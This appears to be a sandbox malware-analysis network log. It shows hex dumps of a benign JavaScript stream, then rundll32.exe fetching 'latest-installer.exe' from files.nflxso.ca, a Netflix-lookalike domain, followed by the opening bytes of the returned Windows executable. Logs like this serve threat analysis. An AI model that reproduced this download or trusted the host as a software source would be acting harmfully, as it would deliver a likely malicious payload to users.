                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 7d 7d 3b 63 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c
                                                                                                                                                                                                            Data Ascii: }};ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};da=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 64 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 64 2e 70 72 6f 74 6f 74 79 70 65 5b 61 5d 26 26 63 61 28 64 2e 70 72 6f 74 6f 74 79 70 65 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 61 28 62 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 70 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 75 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 22 75 6e 64
                                                                                                                                                                                                            Data Ascii: on"===typeof d&&"function"!=typeof d.prototype[a]&&ca(d.prototype,a,{configurable:!0,writable:!0,value:function(){return pa(ba(this))}})}return a});pa=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};_.ua=function(a){var b="und
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 2e 50 66 29 7b 74 68 69 73 2e 50 66 3d 5b 5d 3b 76 61 72 20 6b 3d 74 68 69 73 3b 74 68 69 73 2e 74 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6b 2e 45 37 28 29 7d 29 7d 74 68 69 73 2e 50 66 2e 70 75 73 68 28 68 29 7d 3b 76 61 72 20 64 3d 5f 2e 6d 61 2e 73 65 74 54 69 6d 65 6f 75 74 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 74 50 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 64 28 68 2c 30 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 45 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 3b 74 68 69 73 2e 50 66 26 26 74 68 69 73 2e 50 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 50 66 3b 74 68 69 73 2e 50 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d
                                                                                                                                                                                                            Data Ascii: .Pf){this.Pf=[];var k=this;this.tP(function(){k.E7()})}this.Pf.push(h)};var d=_.ma.setTimeout;b.prototype.tP=function(h){d(h,0)};b.prototype.E7=function(){for(;this.Pf&&this.Pf.length;){var h=this.Pf;this.Pf=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 74 6f 74 79 70 65 2e 6e 65 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 68 69 73 3b 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 68 2e 67 63 61 28 29 29 7b 76 61 72 20 6b 3d 5f 2e 6d 61 2e 63 6f 6e 73 6f 6c 65 3b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 6b 26 26 6b 2e 65 72 72 6f 72 28 68 2e 46 66 29 7d 7d 2c 0a 31 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 63 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 73 56 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 68 3d 5f 2e 6d 61 2e 43 75 73 74 6f 6d 45 76 65 6e 74 2c 6b 3d 5f 2e 6d 61 2e 45 76 65 6e 74 2c 6c 3d 5f 2e 6d 61 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 6c 29 72 65 74
                                                                                                                                                                                                            Data Ascii: totype.nea=function(){var h=this;d(function(){if(h.gca()){var k=_.ma.console;"undefined"!==typeof k&&k.error(h.Ff)}},1)};e.prototype.gca=function(){if(this.sV)return!1;var h=_.ma.CustomEvent,k=_.ma.Event,l=_.ma.dispatchEvent;if("undefined"===typeof l)ret
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 3b 74 68 69 73 2e 73 56 3d 21 30 7d 3b 65 2e 72 65 73 6f 6c 76 65 3d 63 3b 65 2e 72 65 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 6c 28 68 29 7d 29 7d 3b 65 2e 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 66 6f 72 28 76 61 72 20 6d 3d 5f 2e 75 61 28 68 29 2c 6e 3d 6d 2e 6e 65 78 74 28 29 3b 21 6e 2e 64 6f 6e 65 3b 6e 3d 6d 2e 6e 65 78 74 28 29 29 63 28 6e 2e 76 61 6c 75 65 29 2e 42 79 28 6b 2c 6c 29 7d 29 7d 3b 65 2e 61 6c 6c 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 5f 2e 75 61 28 68 29 2c 6c 3d 6b 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 6c 2e 64 6f 6e 65 3f 63
                                                                                                                                                                                                            Data Ascii: ;this.sV=!0};e.resolve=c;e.reject=function(h){return new e(function(k,l){l(h)})};e.race=function(h){return new e(function(k,l){for(var m=_.ua(h),n=m.next();!n.done;n=m.next())c(n.value).By(k,l)})};e.all=function(h){var k=_.ua(h),l=k.next();return l.done?c
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 63 74 2e 73 65 61 6c 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 6c 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6d 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6e 3d 6e 65 77 20 61 28 5b 5b 6c 2c 32 5d 2c 5b 6d 2c 33 5d 5d 29 3b 69 66 28 32 21 3d 6e 2e 67 65 74 28 6c 29 7c 7c 33 21 3d 6e 2e 67 65 74 28 6d 29 29 72 65 74 75 72 6e 21 31 3b 6e 2e 64 65 6c 65 74 65 28 6c 29 3b 6e 2e 73 65 74 28 6d 2c 34 29 3b 72 65 74 75 72 6e 21 6e 2e 68 61 73 28 6c 29 26 26 34 3d 3d 6e 2e 67 65 74 28 6d 29 7d 63 61 74 63 68 28 70 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 0a 76 61 72 20 66 3d 22 24 6a 73 63 6f 6d 70 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b
                                                                                                                                                                                                            Data Ascii: ct.seal)return!1;try{var l=Object.seal({}),m=Object.seal({}),n=new a([[l,2],[m,3]]);if(2!=n.get(l)||3!=n.get(m))return!1;n.delete(l);n.set(m,4);return!n.has(l)&&4==n.get(m)}catch(p){return!1}}())return a;var f="$jscomp_hidden_"+Math.random();e("freeze");
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 20 62 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 0a 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 3b 69 66 28 6b 29 7b 6b 3d 5f 2e 75 61 28 6b 29 3b 66 6f 72 28 76 61 72 20 6c 3b 21 28 6c 3d 6b 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6c 3d 6c 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6c 5b 30 5d 2c 6c 5b 31 5d 29 7d 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 6b 3d 30 3d 3d 3d 6b 3f 30 3a 6b 3b 76 61 72 20 6d 3d 64 28 74 68 69 73 2c 6b 29 3b 6d 2e 6c 69 73 74 7c 7c 28 6d 2e 6c 69 73 74 3d 74 68 69 73 5b 30 5d 5b 6d 2e 69 64 5d 3d 5b 5d 29 3b 6d 2e 6e 66 3f 6d 2e 6e 66 2e 76 61 6c 75 65 3d 6c 3a 28 6d
                                                                                                                                                                                                            Data Ascii: b=new WeakMap,c=function(k){this[0]={};this[1]=f();this.size=0;if(k){k=_.ua(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}};c.prototype.set=function(k,l){k=0===k?0:k;var m=d(this,k);m.list||(m.list=this[0][m.id]=[]);m.nf?m.nf.value=l:(m
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 6d 3d 62 2e 67 65 74 28 6c 29 3a 28 6d 3d 22 22 2b 20 2b 2b 68 2c 62 2e 73 65 74 28 6c 2c 6d 29 29 3a 6d 3d 22 70 5f 22 2b 6c 3b 76 61 72 20 6e 3d 6b 5b 30 5d 5b 6d 5d 3b 69 66 28 6e 26 26 76 61 28 6b 5b 30 5d 2c 6d 29 29 66 6f 72 28 6b 3d 30 3b 6b 3c 6e 2e 6c 65 6e 67 74 68 3b 6b 2b 2b 29 7b 76 61 72 20 70 3d 6e 5b 6b 5d 3b 69 66 28 6c 21 3d 3d 6c 26 26 70 2e 6b 65 79 21 3d 3d 70 2e 6b 65 79 7c 7c 6c 3d 3d 3d 70 2e 6b 65 79 29 72 65 74 75 72 6e 7b 69 64 3a 6d 2c 6c 69 73 74 3a 6e 2c 69 6e 64 65 78 3a 6b 2c 6e 66 3a 70 7d 7d 72 65 74 75 72 6e 7b 69 64 3a 6d 2c 6c 69 73 74 3a 6e 2c 69 6e 64 65 78 3a 2d 31 2c 6e 66 3a 76 6f 69 64 20 30 7d 7d 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 2c 6c 29 7b 76 61 72 20 6d 3d 6b 5b 31 5d 3b 72 65 74 75 72 6e 20 70 61 28 66
                                                                                                                                                                                                            Data Ascii: m=b.get(l):(m=""+ ++h,b.set(l,m)):m="p_"+l;var n=k[0][m];if(n&&va(k[0],m))for(k=0;k<n.length;k++){var p=n[k];if(l!==l&&p.key!==p.key||l===p.key)return{id:m,list:n,index:k,nf:p}}return{id:m,list:n,index:-1,nf:void 0}},e=function(k,l){var m=k[1];return pa(f
                                                                                                                                                                                                            2024-05-01 09:08:18 UTC1255INData Raw: 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 65 74 75 72 6e 21 31 3b 66 3d 65 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 34 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e 65 78 74 28 29 2e 64 6f 6e 65 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 68 69 73 2e 44 61 3d 6e 65 77 20 4d 61 70 3b 69 66 28 63 29 7b 63 3d
                                                                                                                                                                                                            Data Ascii: urn!1;var e=d.entries(),f=e.next();if(f.done||f.value[0]!=c||f.value[1]!=c)return!1;f=e.next();return f.done||f.value[0]==c||4!=f.value[0].x||f.value[1]!=f.value[0]?!1:e.next().done}catch(h){return!1}}())return a;var b=function(c){this.Da=new Map;if(c){c=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.449747172.67.152.1514438344C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC179OUTGET /downloads/winapp/latest-installer.exe HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999
                                                                                                                                                                                                            Host: files.nflxso.ca
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC692INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:19 GMT
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Content-Length: 7055674
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            last-modified: Wed, 23 Nov 2022 20:15:22 GMT
                                                                                                                                                                                                            etag: "637e7f5a-6ba93a"
                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uBVPstCpCZEZx0R8fJq%2FXPP9N22sXYiJK%2BsyR%2Bndqt8V2UYnD6hTjsIkzxKu9ycBSna1hGwqmn33KzRmBRpop2QcYPKz9iirOzchuG4OqBSo9SznTjeTvn2JHy%2FEU17NuPk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 87cea0547f6d584e-IAD
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC677INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 79 7f 15 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 8a 06 00 00 40 00
                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELy\f@
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC1369INData Raw: 33 c0 5e c2 08 00 b8 ff ff ff 7f eb f5 8b 44 24 04 8b 0d 54 02 47 00 6a 00 ff 74 81 6c e8 69 ff ff ff c2 04 00 68 d8 e5 40 00 ff 74 24 08 e8 1f 40 00 00 c2 04 00 55 8b ec 81 ec d4 02 00 00 53 56 8b 75 08 57 a1 48 02 47 00 6a 07 59 8d 7d d4 f3 a5 8b 4d dc 8b 55 d4 bf 00 10 47 00 89 45 f8 8b 45 d8 33 db c1 e1 0e 03 cf 8b f0 89 4d f4 8d 4d d8 c1 e6 0e 89 0d 34 e6 41 00 8d 4a fe 03 f7 83 f9 43 89 5d fc 0f 87 3b 16 00 00 ff 24 8d d7 2a 40 00 53 50 e8 b8 3f 00 00 e9 5a 0e 00 00 ff 05 0c 82 46 00 39 5d f8 0f 84 4b 0e 00 00 53 ff 15 94 82 40 00 e9 3f 0e 00 00 50 e8 af fe ff ff 48 53 50 e8 c3 fe ff ff e9 05 16 00 00 53 50 e8 7e 3f 00 00 e9 ee 15 00 00 53 e8 42 17 00 00 83 f8 01 59 89 55 b4 7f 03 33 c0 40 50 ff 15 78 80 40 00 e9 d0 15 00 00 ff 75 f8 ff 15 64 82 40
                                                                                                                                                                                                            Data Ascii: 3^D$TGjtlih@t$@USVuWHGjY}MUGEE3MM4AJC];$*@SP?ZF9]KS@?PHSPSP~?SBYU3@Px@ud@
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC1369INData Raw: 01 e8 e4 12 00 00 50 e8 9b 4a 00 00 e9 2a 0c 00 00 6a 02 e8 b0 12 00 00 6a 03 89 45 b0 89 55 b4 e8 a3 12 00 00 59 8b f8 8b 45 b0 59 6a 01 89 7d cc 89 55 d0 89 45 08 e8 ae 12 00 00 50 89 45 c4 e8 62 4a 00 00 39 5d b4 66 89 1e 75 03 89 45 08 39 5d 08 0f 84 15 11 00 00 8b 4d cc 3b cb 7d 0b 8d 3c 08 3b fb 0f 8c 03 11 00 00 3b f8 7e 02 8b f8 8b 45 c4 8d 04 78 50 56 e8 13 4a 00 00 39 5d 08 7d 0e 56 e8 1e 4a 00 00 01 45 08 79 03 89 5d 08 8b 45 08 3d 00 20 00 00 0f 8d cf 10 00 00 66 89 1c 46 e9 c6 10 00 00 6a 20 e8 3b 12 00 00 6a 31 8b f0 e8 32 12 00 00 39 5d e8 50 56 75 12 ff 15 04 81 40 00 85 c0 75 7c 8b 45 e0 e9 a8 10 00 00 ff 15 1c 81 40 00 eb ec 33 ff 47 57 e8 08 12 00 00 68 00 20 00 00 56 50 89 45 08 ff 15 24 81 40 00 85 c0 74 13 39 5d e0 74 14 56 ff 75 08
                                                                                                                                                                                                            Data Ascii: PJ*jjEUYEYj}UEPEbJ9]fuE9]M;}<;;~ExPVJ9]}VJEy]E= fFj ;j129]PVu@u|E@3GWh VPE$@t9]tVu
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC1369INData Raw: 84 8b 45 e4 89 45 98 66 8b 06 66 f7 d8 1b c0 89 5d 8c 23 c6 89 45 88 66 8b 07 66 f7 d8 1b c0 c7 45 94 00 90 4c 00 23 c7 89 45 90 8d 85 7c ff ff ff 50 e8 2d 3b 00 00 85 c0 0f 84 9c 09 00 00 f6 45 80 40 0f 84 cc 0b 00 00 ff 75 b4 e8 72 49 00 00 ff 75 b4 eb 47 53 e8 35 0d 00 00 8b f0 56 6a eb e8 3a 35 00 00 56 e8 b5 3a 00 00 8b f0 3b f3 0f 84 65 09 00 00 39 5d e0 74 21 56 e8 42 49 00 00 39 5d dc 7c 0b 50 ff 75 f4 e8 f0 43 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 20 81 40 00 e9 6d 0b 00 00 6a 02 e8 e2 0c 00 00 50 e8 c6 47 00 00 8b f8 3b fb 74 13 ff 77 14 ff 75 f4 e8 b9 43 00 00 ff 77 18 e9 ef f5 ff ff 8b 45 f4 66 89 1e 66 89 18 e9 ff 08 00 00 6a ee e8 ae 0c 00 00 8d 4d b4 89 45 d0 51 50 6a 09 e8 20 48 00 00 ff d0 8b f8 8b 45 f4 66 89 1e 3b fb 66
                                                                                                                                                                                                            Data Ascii: EEff]#EffEL#E|P-;E@urIuGS5Vj:5V:;e9]t!VBI9]|PuC;tEV @mjPG;twuCwEffjMEQPj HEf;f
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC1369INData Raw: 00 00 e8 c1 08 00 00 3b c3 89 45 08 0f 84 aa 06 00 00 33 c0 83 fe 01 bf d8 25 41 00 75 11 6a 23 e8 13 08 00 00 57 e8 ca 3f 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 db 07 00 00 59 a3 d8 25 41 00 56 89 55 d0 58 83 fe 03 75 0f 68 00 c0 00 00 57 53 ff 75 e4 e8 73 0d 00 00 50 57 ff 75 b4 53 ff 75 c4 ff 75 08 ff 15 28 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00 68 19 00 02 00 e8 f3 07 00 00 6a 33 8b f8 e8 aa 07 00 00 3b fb 66 89 1e 0f 84 e9 03 00 00 8d 4d b4 c7 45 b4 00 40 00 00 51 8d 4d 08 56 51 53 50 57 ff 15 2c 80 40 00 33 c9 41 85 c0 75 2e 83 7d 08 04 74 13 39 4d 08 74 06 83 7d 08 02 75 1d 8b 45 e8 89 45 fc eb 74 ff 36 33 c0 39 5d e8 56 0f 94 c0 89 45 fc e8 41 3e 00 00 eb 66 66 89 1e 89 4d fc eb 5e 68 19 00 02 00 e8 7f 07 00 00 6a 03 8b f8 e8 14
                                                                                                                                                                                                            Data Ascii: ;E3%Auj#W?DujY%AVUXuhWSusPWuSuu(@u]uhj3;fME@QMVQSPW,@3Au.}t9Mt}uEEt639]VEA>ffM^hj
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC1369INData Raw: 08 e8 28 36 00 00 57 ff 15 28 81 40 00 53 53 ff 75 08 6a ff e8 5b 08 00 00 89 45 d0 ff 75 08 ff 15 20 81 40 00 39 5d d0 6a f3 5e 7d 13 6a ef 5e ff 75 c8 ff 15 40 81 40 00 c7 45 fc 01 00 00 00 56 e9 a3 f8 ff ff 53 e8 71 02 00 00 8b f8 59 3b 3d 8c 02 47 00 89 55 b4 0f 83 cb fe ff ff 8b f7 8b 45 e0 69 f6 18 40 00 00 03 35 88 02 47 00 3b c3 7c 19 8b 0c 86 75 11 83 c6 18 56 ff 75 f4 e8 02 3a 00 00 e9 da 00 00 00 51 eb 7a 83 c9 ff 2b c8 89 4d e0 74 10 6a 01 e8 20 02 00 00 59 89 55 b4 89 45 dc eb 10 ff 75 e8 8d 46 18 50 e8 f6 39 00 00 80 4e 09 01 8b 45 e0 8b 4d dc 89 0c 86 39 5d e4 0f 84 9b 00 00 00 57 e8 4d e7 ff ff e9 90 00 00 00 53 e8 e4 01 00 00 83 f8 20 59 89 55 b4 0f 83 43 fe ff ff 39 5d e4 74 25 39 5d e0 74 0f 50 e8 41 e8 ff ff 53 53 e8 90 e7 ff ff eb 64
                                                                                                                                                                                                            Data Ascii: (6W(@SSuj[Eu @9]j^}j^u@@EVSqY;=GUEi@5G;|uVu:Qz+Mtj YUEuFP9NEM9]WMS YUC9]t%9]tPASSd
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC1369INData Raw: 42 00 74 08 56 e8 39 39 00 00 eb 66 ff 15 7c 80 40 00 3b 05 50 02 47 00 76 58 39 35 48 02 47 00 74 2d f6 05 14 03 47 00 01 74 47 e8 87 ff ff ff 50 8d 45 80 68 80 a0 40 00 50 ff 15 90 82 40 00 83 c4 0c 8d 45 80 50 56 e8 48 25 00 00 eb 23 56 68 f3 2d 40 00 56 6a 6f ff 35 40 02 47 00 ff 15 88 82 40 00 6a 05 50 a3 dc a6 42 00 ff 15 68 82 40 00 5e c9 c3 55 8b ec 81 ec 2c 02 00 00 53 56 33 db 57 89 5d fc 89 5d f8 ff 15 7c 80 40 00 be 00 d0 4d 00 68 00 20 00 00 05 e8 03 00 00 56 53 a3 50 02 47 00 ff 15 88 80 40 00 6a 03 68 00 00 00 80 56 e8 6b 2f 00 00 8b f8 83 ff ff 89 3d 18 a0 40 00 75 0a b8 b8 a2 40 00 e9 45 02 00 00 56 be 00 d0 4c 00 56 e8 52 34 00 00 56 e8 6d 2d 00 00 50 68 00 10 4e 00 e8 41 34 00 00 53 57 ff 15 84 80 40 00 3b c3 a3 e0 a6 42 00 8b f0 0f 8e
                                                                                                                                                                                                            Data Ascii: BtV99f|@;PGvX95HGt-GtGPEh@P@EPVH%#Vh-@Vjo5@G@jPBh@^U,SV3W]]|@Mh VSPG@jhVk/=@u@EVLVR4Vm-PhNA4SW@;B
                                                                                                                                                                                                            2024-05-01 09:08:19 UTC1369INData Raw: ff ff ff 53 53 50 ff 35 1c a0 40 00 ff 15 44 81 40 00 eb 0e 83 c8 ff eb 13 6a fe eb 02 6a fd 58 eb 0a 6a 01 e8 51 fa ff ff 59 33 c0 5f 5e 5d 5b c2 04 00 ff 74 24 08 ff 74 24 08 ff 35 18 a0 40 00 e8 07 2b 00 00 c2 08 00 6a 00 6a 00 ff 74 24 0c ff 35 18 a0 40 00 ff 15 44 81 40 00 c2 04 00 56 be 00 50 4d 00 56 e8 fc 31 00 00 56 e8 ae 28 00 00 85 c0 75 02 5e c3 56 e8 2b 28 00 00 56 e8 04 25 00 00 56 68 00 10 4d 00 e8 6a 2a 00 00 5e c3 81 ec d4 02 00 00 53 56 57 6a 20 5f 33 db 68 01 80 00 00 89 5c 24 14 c7 44 24 10 30 a2 40 00 89 5c 24 1c ff 15 ac 80 40 00 ff 15 a8 80 40 00 25 ff ff ff bf 66 3d 06 00 a3 4c 02 47 00 74 11 53 e8 d8 32 00 00 3b c3 74 07 68 00 0c 00 00 ff d0 be b0 82 40 00 56 e8 52 32 00 00 56 ff 15 50 81 40 00 8d 74 06 01 80 3e 00 75 ea 6a 0a e8
                                                                                                                                                                                                            Data Ascii: SSP5@D@jjXjQY3_^][t$t$5@+jjt$5@D@VPMV1V(u^V+(V%VhMj*^SVWj _3h\$D$0@\$@@%f=LGtS2;th@VR2VP@t>uj
